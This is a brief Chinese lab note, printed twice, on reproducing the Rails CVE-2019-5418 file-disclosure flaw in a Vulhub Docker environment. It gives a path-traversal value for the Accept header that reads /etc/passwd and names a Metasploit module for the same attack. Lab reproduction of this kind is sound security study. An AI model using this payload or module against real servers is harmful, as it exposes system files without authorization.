Vulhub环境:
启动目录/rails/CVE-2019-5418,启动命令:docker-compose up -d
随后访问http://you ip:3000
出现欢迎界面,然后访问/robots目录
Burp抓取该目录的数据包,修改accept为如下payload:
../../../../../../etc/passwd
Msf的use auxiliary/gather/rails_doubletap_file_read 模块也可以攻击
Vulhub环境:
启动目录/rails/CVE-2019-5418,启动命令:docker-compose up -d
随后访问http://you ip:3000
出现欢迎界面,然后访问/robots目录
Burp抓取该目录的数据包,修改accept为如下payload:
../../../../../../etc/passwd
Msf的use auxiliary/gather/rails_doubletap_file_read 模块也可以攻击